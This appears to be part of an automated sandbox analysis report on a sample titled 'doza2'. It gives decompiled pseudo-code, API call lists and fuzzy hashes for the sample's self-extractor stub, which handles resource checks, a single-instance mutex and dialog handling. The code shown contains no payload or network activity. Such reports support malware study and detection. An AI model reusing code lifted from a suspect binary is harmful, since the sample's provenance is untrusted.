                                                                                                                                                                                                                                    0x004033c3
                                                                                                                                                                                                                                    0x004033c5
                                                                                                                                                                                                                                    0x00403435
                                                                                                                                                                                                                                    0x00403437
                                                                                                                                                                                                                                    0x00403437
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403437
                                                                                                                                                                                                                                    0x004033c7
                                                                                                                                                                                                                                    0x004033c9
                                                                                                                                                                                                                                    0x004033cc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004033cc
                                                                                                                                                                                                                                    0x004033ad
                                                                                                                                                                                                                                    0x004033b4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004033b4
                                                                                                                                                                                                                                    0x00403398
                                                                                                                                                                                                                                    0x00403399
                                                                                                                                                                                                                                    0x0040339b
                                                                                                                                                                                                                                    0x0040339c
                                                                                                                                                                                                                                    0x0040339d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040339d
                                                                                                                                                                                                                                    0x0040334c
                                                                                                                                                                                                                                    0x00403351
                                                                                                                                                                                                                                    0x00403354
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040335c
                                                                                                                                                                                                                                    0x00403362
                                                                                                                                                                                                                                    0x00403364
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403366
                                                                                                                                                                                                                                    0x00403367
                                                                                                                                                                                                                                    0x00403369
                                                                                                                                                                                                                                    0x0040336a
                                                                                                                                                                                                                                    0x0040336b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040336b
                                                                                                                                                                                                                                    0x0040331c
                                                                                                                                                                                                                                    0x00403323
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403329
                                                                                                                                                                                                                                    0x0040332b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040332b
                                                                                                                                                                                                                                    0x0040324c
                                                                                                                                                                                                                                    0x0040324c
                                                                                                                                                                                                                                    0x0040324f
                                                                                                                                                                                                                                    0x004032c8
                                                                                                                                                                                                                                    0x004032ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004032ce
                                                                                                                                                                                                                                    0x00403251
                                                                                                                                                                                                                                    0x00403256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403271
                                                                                                                                                                                                                                    0x00403277
                                                                                                                                                                                                                                    0x00403279
                                                                                                                                                                                                                                    0x00403298
                                                                                                                                                                                                                                    0x0040329d
                                                                                                                                                                                                                                    0x0040329f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004032b0
                                                                                                                                                                                                                                    0x004032b6
                                                                                                                                                                                                                                    0x004032b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004032be
                                                                                                                                                                                                                                    0x00403280
                                                                                                                                                                                                                                    0x00403289
                                                                                                                                                                                                                                    0x0040328e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040328e
                                                                                                                                                                                                                                    0x0040327b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040327b
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00408598,00000200), ref: 00403271
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004033E2
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 004033F7
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00403410
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00403426
                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0040342D
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0040343F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$doza2
                                                                                                                                                                                                                                    • API String ID: 2418873061-2567452070
                                                                                                                                                                                                                                    • Opcode ID: ec0898f5d764152806d941a8be05ff3854ee7734cea54d763d8cbd8109858449
                                                                                                                                                                                                                                    • Instruction ID: 04d5c2a8db134baef30f0d0166c5a423a0fa44611ce3e06c27fd7db4b1552688
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec0898f5d764152806d941a8be05ff3854ee7734cea54d763d8cbd8109858449
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7551E47034024176E7215F365D8CF7B2D5D9B86B56F10403AFA45BA2D1CABC8E02926E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E00402CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x408004; // 0x8f135e3b
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x409a3c = __ecx;
				memset(0x409140, 0, 0x8fc);
				memset(0x408a20, 0, 0x32c);
				memset(0x4088c0, 0, 0x104);
				 *0x4093ec = 1;
				_t20 = E0040468F("TITLE", 0x409154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x40858c = _t27;
					SetEvent(_t27);
					_t64 = 0x409a34;
					if(E0040468F("EXTRACTOPT", 0x409a34, 4) != 0) {
						if(( *0x409a34 & 0x000000c0) == 0) {
							L12:
							 *0x409120 =  *0x409120 & _t65;
							if(E00405C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x408a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x408184 != 0) {
										__imp__#17();
									}
									if( *0x408a24 == 0) {
										_t57 = _t65;
										if(E004036EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x409a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x409a34 & 0x00000100) == 0 || ( *0x408a38 & 0x00000001) != 0 || E004018A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00406517(_t57, 0x7d6, _t34, E004019E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00402390(0x408a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E004044B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0040468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x408588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x409a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E004044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E004044B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x408588);
										 *0x409124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x409124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00406CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                                                    0x00402cb5
                                                                                                                                                                                                                                    0x00402cbc
                                                                                                                                                                                                                                    0x00402cc7
                                                                                                                                                                                                                                    0x00402cc9
                                                                                                                                                                                                                                    0x00402cd1
                                                                                                                                                                                                                                    0x00402cd3
                                                                                                                                                                                                                                    0x00402cd9
                                                                                                                                                                                                                                    0x00402ce9
                                                                                                                                                                                                                                    0x00402cf9
                                                                                                                                                                                                                                    0x00402d0e
                                                                                                                                                                                                                                    0x00402d15
                                                                                                                                                                                                                                    0x00402d1c
                                                                                                                                                                                                                                    0x00402ef3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402d2d
                                                                                                                                                                                                                                    0x00402d34
                                                                                                                                                                                                                                    0x00402d3b
                                                                                                                                                                                                                                    0x00402d40
                                                                                                                                                                                                                                    0x00402d48
                                                                                                                                                                                                                                    0x00402d59
                                                                                                                                                                                                                                    0x00402d84
                                                                                                                                                                                                                                    0x00402e1f
                                                                                                                                                                                                                                    0x00402e1f
                                                                                                                                                                                                                                    0x00402e2e
                                                                                                                                                                                                                                    0x00402e41
                                                                                                                                                                                                                                    0x00402e5a
                                                                                                                                                                                                                                    0x00402e62
                                                                                                                                                                                                                                    0x00402e6c
                                                                                                                                                                                                                                    0x00402e6c
                                                                                                                                                                                                                                    0x00402e75
                                                                                                                                                                                                                                    0x00402e77
                                                                                                                                                                                                                                    0x00402e77
                                                                                                                                                                                                                                    0x00402e84
                                                                                                                                                                                                                                    0x00402e8b
                                                                                                                                                                                                                                    0x00402e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402e96
                                                                                                                                                                                                                                    0x00402e96
                                                                                                                                                                                                                                    0x00402e9e
                                                                                                                                                                                                                                    0x00402ea2
                                                                                                                                                                                                                                    0x00402eba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402ece
                                                                                                                                                                                                                                    0x00402ede
                                                                                                                                                                                                                                    0x00402eed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402eed
                                                                                                                                                                                                                                    0x00402eef
                                                                                                                                                                                                                                    0x00402eef
                                                                                                                                                                                                                                    0x00402eef
                                                                                                                                                                                                                                    0x00402eef
                                                                                                                                                                                                                                    0x00402ea2
                                                                                                                                                                                                                                    0x00402e86
                                                                                                                                                                                                                                    0x00402e88
                                                                                                                                                                                                                                    0x00402e88
                                                                                                                                                                                                                                    0x00402e43
                                                                                                                                                                                                                                    0x00402e48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402e48
                                                                                                                                                                                                                                    0x00402e30
                                                                                                                                                                                                                                    0x00402e30
                                                                                                                                                                                                                                    0x00402ef8
                                                                                                                                                                                                                                    0x00402f01
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402f01
                                                                                                                                                                                                                                    0x00402d8a
                                                                                                                                                                                                                                    0x00402d8f
                                                                                                                                                                                                                                    0x00402da1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402da3
                                                                                                                                                                                                                                    0x00402dae
                                                                                                                                                                                                                                    0x00402db4
                                                                                                                                                                                                                                    0x00402dbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402dca
                                                                                                                                                                                                                                    0x00402dd3
                                                                                                                                                                                                                                    0x00402df5
                                                                                                                                                                                                                                    0x00402e02
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402dd5
                                                                                                                                                                                                                                    0x00402dde
                                                                                                                                                                                                                                    0x00402de3
                                                                                                                                                                                                                                    0x00402e04
                                                                                                                                                                                                                                    0x00402e0a
                                                                                                                                                                                                                                    0x00402e10
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402e10
                                                                                                                                                                                                                                    0x00402dd3
                                                                                                                                                                                                                                    0x00402dbb
                                                                                                                                                                                                                                    0x00402da1
                                                                                                                                                                                                                                    0x00402d5b
                                                                                                                                                                                                                                    0x00402d5b
                                                                                                                                                                                                                                    0x00402d5d
                                                                                                                                                                                                                                    0x00402d69
                                                                                                                                                                                                                                    0x00402d6e
                                                                                                                                                                                                                                    0x00402f06
                                                                                                                                                                                                                                    0x00402f06
                                                                                                                                                                                                                                    0x00402f06
                                                                                                                                                                                                                                    0x00402d59
                                                                                                                                                                                                                                    0x00402f18

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CD9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CF9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D34
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D40
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402DAE
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00402DBD
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402E0A
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
                                                                                                                                                                                                                                    • API String ID: 1002816675-859929227
                                                                                                                                                                                                                                    • Opcode ID: 06a1384d55922b296fef3c7e0fb44f01fcc884fa569341a545031c3eadd7a355
                                                                                                                                                                                                                                    • Instruction ID: e444e2bf9980804398d7675b07319dafb34b849b4f2297f1b5b9eb94544be107
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a1384d55922b296fef3c7e0fb44f01fcc884fa569341a545031c3eadd7a355
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51C470340301ABE764AB25DF4EB7B2698DB85744F10403FBA81F56E1DAFC8C519A5E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004034F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                                                    			E004034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x4091d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x408584 = _t35;
					E004043D0(_t35, GetDesktopWindow());
					__eflags =  *0x408184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00404FE0, 0, 0, 0x408798);
					 *0x40879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E004044B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x40858c);
					_t38 =  *0x408584; // 0x0
					_t25 = E004044B9(_t38, 0x4b2, 0x401140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x4091d8 = 1;
						SetEvent( *0x40858c);
						_t39 =  *0x40879c; // 0x0
						E00403680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x40858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x40879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                                                    0x004034fb
                                                                                                                                                                                                                                    0x004034fe
                                                                                                                                                                                                                                    0x00403665
                                                                                                                                                                                                                                    0x00403666
                                                                                                                                                                                                                                    0x00403666
                                                                                                                                                                                                                                    0x00403668
                                                                                                                                                                                                                                    0x0040366e
                                                                                                                                                                                                                                    0x0040366e
                                                                                                                                                                                                                                    0x00403671
                                                                                                                                                                                                                                    0x00403671
                                                                                                                                                                                                                                    0x00403677
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403677
                                                                                                                                                                                                                                    0x00403504
                                                                                                                                                                                                                                    0x00403506
                                                                                                                                                                                                                                    0x00403507
                                                                                                                                                                                                                                    0x0040350c
                                                                                                                                                                                                                                    0x0040365b
                                                                                                                                                                                                                                    0x0040365f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403661
                                                                                                                                                                                                                                    0x00403512
                                                                                                                                                                                                                                    0x00403515
                                                                                                                                                                                                                                    0x004035be
                                                                                                                                                                                                                                    0x004035c1
                                                                                                                                                                                                                                    0x004035d1
                                                                                                                                                                                                                                    0x004035d8
                                                                                                                                                                                                                                    0x004035de
                                                                                                                                                                                                                                    0x004035f8
                                                                                                                                                                                                                                    0x00403617
                                                                                                                                                                                                                                    0x00403617
                                                                                                                                                                                                                                    0x00403623
                                                                                                                                                                                                                                    0x00403637
                                                                                                                                                                                                                                    0x0040363d
                                                                                                                                                                                                                                    0x00403642
                                                                                                                                                                                                                                    0x00403644
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403646
                                                                                                                                                                                                                                    0x00403652
                                                                                                                                                                                                                                    0x00403657
                                                                                                                                                                                                                                    0x00403658
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403658
                                                                                                                                                                                                                                    0x00403644
                                                                                                                                                                                                                                    0x0040351b
                                                                                                                                                                                                                                    0x0040351d
                                                                                                                                                                                                                                    0x0040354f
                                                                                                                                                                                                                                    0x00403553
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040355f
                                                                                                                                                                                                                                    0x00403565
                                                                                                                                                                                                                                    0x0040357c
                                                                                                                                                                                                                                    0x00403581
                                                                                                                                                                                                                                    0x00403584
                                                                                                                                                                                                                                    0x0040359b
                                                                                                                                                                                                                                    0x004035a1
                                                                                                                                                                                                                                    0x004035a7
                                                                                                                                                                                                                                    0x004035ad
                                                                                                                                                                                                                                    0x004035b3
                                                                                                                                                                                                                                    0x004035b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004035b8
                                                                                                                                                                                                                                    0x00403586
                                                                                                                                                                                                                                    0x00403588
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403590
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403590
                                                                                                                                                                                                                                    0x00403524
                                                                                                                                                                                                                                    0x00403535
                                                                                                                                                                                                                                    0x00403541
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403549
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00403535
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00403541
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0040355F
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00401140,00000000,00000020,00000004), ref: 00403590
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004035C7
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 004035F1
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 004035F8
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00403610
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00403617
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00403623
                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00403637
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00403671
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 2406144884-612509477
                                                                                                                                                                                                                                    • Opcode ID: a4f2e3a6efda55c1be015cdbd079bcaf155c5ca070df6f1d562e5e6d6ca8b650
                                                                                                                                                                                                                                    • Instruction ID: fe1ba82ed1f1710f0b6574d98c0674f12e8c992116b8aaefa4380529af25bc15
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4f2e3a6efda55c1be015cdbd079bcaf155c5ca070df6f1d562e5e6d6ca8b650
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C317271240301BBD7205F25AE4DF2B3E68E789B42F14493AF642B93F5CA7A8911CA5D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E00404224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E004044B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x4088c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x4087a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x408598;
					_v36 = 1;
					_v32 = E00404200;
					_v28 = 0x4088c0;
					 *0x40a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x40a288(_t32, 0x4088c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x4088c0 != 0) {
							E00401680(0x4087a0, 0x104, 0x4088c0);
						}
						 *0x40a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x4087a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x4088c0);
					_t61 = 0x4088c0;
					_t4 =  &(_t61[1]); // 0x4088c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x4088c0; // 0x811181
					_t44 = CharPrevA(0x4088c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x4088c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                    0x00404234
                                                                                                                                                                                                                                    0x0040423c
                                                                                                                                                                                                                                    0x00404240
                                                                                                                                                                                                                                    0x004043b2
                                                                                                                                                                                                                                    0x004043b7
                                                                                                                                                                                                                                    0x004043c0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004043c5
                                                                                                                                                                                                                                    0x0040424c
                                                                                                                                                                                                                                    0x00404252
                                                                                                                                                                                                                                    0x00404257
                                                                                                                                                                                                                                    0x004043a4
                                                                                                                                                                                                                                    0x004043a5
                                                                                                                                                                                                                                    0x004043ab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004043ab
                                                                                                                                                                                                                                    0x00404263
                                                                                                                                                                                                                                    0x00404269
                                                                                                                                                                                                                                    0x0040426e
